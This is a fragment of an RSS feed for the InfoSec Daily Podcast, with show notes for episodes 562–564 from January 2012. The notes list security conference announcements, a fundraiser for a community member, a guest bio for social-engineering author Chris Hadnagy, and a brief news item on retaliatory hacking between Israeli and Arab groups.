		<itunes:summary>InfoSec Daily Podcast Episode 564 for January 10, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	On &#160;a somewhat related note, Mubix launched a poll to see which podcasts everyone is listening to. &#160;Go to http://twtpoll.com/jlknm0 to take the poll.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.globes.co.il/serveen/globes/docview.asp?did=1000713894
Israeli hackers decided this past weekend to retaliate in an unorganized fashion: On an Israeli hacking forum, personal details were revealed (including phone numbers) of users from an Arab website that was hacked by an Israeli. Another column on the screen that was hidden could have been credit card details of the users. In addition, a number of other Arab sites were hacked into over the weekend, apparently by Israelis.
	In the meantime, Arab hackers have published a list of Israeli sites t[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 563 &#8211; Interview with Chris Hadnagy (@humanhacker)</title>
		<link>http://www.isdpodcast.com/episode-563-interview-with-chris-hadnagy-humanhacker</link>
		<comments>http://www.isdpodcast.com/episode-563-interview-with-chris-hadnagy-humanhacker#comments</comments>
		<pubDate>Tue, 10 Jan 2012 02:24:43 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3348</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 563 for January 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Varun Sharma. &#160; Announcements: Information Security Blogger Awards 2012 Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 563 for January 9, 2012. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On &nbsp;a somewhat related note, Mubix launched a poll to see which podcasts everyone is listening to. &nbsp;Go to </span><a href="http://twtpoll.com/jlknm0"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://twtpoll.com/jlknm0</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to take the poll.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012 <br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012 <br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012 </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012 <br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open! </span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Chris Hadnagy, aka loganWHD, has been involved with computers and technology for over 14 years. Presently his focus is on the &quot;human&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">aspect of technology such as social engineering and physical security. Chris has spent time in providing training in many topics around the globe and also has had many articles published in local, national and international magazines and journals.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Chris was a student of Paul Ekman&#39;s training classes on Microexpressions and has spent time learning and educating others on the values of nonverbal communications. He has combined what he learned with years of experience in a new research he has called Neuro Linguistic Hacking(NLH) that combines nonverbal communications as well as the principles of the controversial study on NLP to influence other peoples emotions.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He is also the lead developer of Social-Engineer.Org as well as a the author of the best-selling, Social Engineering: The Art of Human Hacking.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-563-interview-with-chris-hadnagy-humanhacker/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3348/0/infosec-daily-podcast-episode-563.mp3" length="32753725" type="audio/mpeg" />
		<itunes:duration>1:08:11</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 563 for January 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.
	&#160;
Announcements:
Information Security Blogger Awards[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 563 for January 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	On &#160;a somewhat related note, Mubix launched a poll to see which podcasts everyone is listening to. &#160;Go to http://twtpoll.com/jlknm0 to take the poll.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012 
	Where: Seattle, Washington
	When: July 21-24, 2012 
	Where: Black Hat Vegas
	When: August 20-24, 2012 
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012 
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open! 

	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Chris Hadnagy, aka loganWHD, has been involved with computers and technology for over 14 years. Presently his focus is on the &#34;human&#34;
	aspect of technology such as social engineering and physical security. Chris has spent time in providing training in many topics around the globe and also has had many articles published in local, national and international magazines and journals.

	Chris was a student of Paul Ekman&#39;s training classes on Microexpressions and has spent time learning and educating others on the values of nonverbal commun[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 562 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-562-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-562-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 08 Jan 2012 03:02:15 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3346</guid>
		<description><![CDATA[&#160; Episode 562 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 562 for January 7, 2012. &#160;Tonight&#039;s podcast is hosted by Dr bonez. Guests: Hackett, brew_ninja, oncee, and spridel. Announcements: Information Security Blogger Awards 2012 Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<div style="background-color: transparent"><b><span>Episode 562 &#8211; Weekend Wrap-up with Dr. b0n3z</span><br />
	<span>InfoSec Daily Podcast Episode 562 for January 7, 2012. &nbsp;</span><span>Tonight&#039;s podcast is hosted by Dr bonez.</span></p>
<p>	<span>Guests: Hackett, brew_ninja, oncee, and spridel.</span></p>
<p>	</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Announcements:</span></b></p>
<p>	<b><span>Information Security Blogger Awards 2012</span><br />
	<span>Since we were over looked again for the Best Podcast on Security </span><span>you can email </span><a href="mailto:ashimmy@hotmail.com"><span>ashimmy@hotmail.com</span></a><span> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span>www.ashimmy.com</span></a><span>.</span></p>
<p>	<span>Brad Smith (theNurse)</span><br />
	<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span>NOVA Hackers Open House</span><br />
	<span>When: January 9th, 2012 at 6:00PM</span><br />
	<span>Where: ICF International, 9300 Lee Highway, Fairfax, VA</span><br />
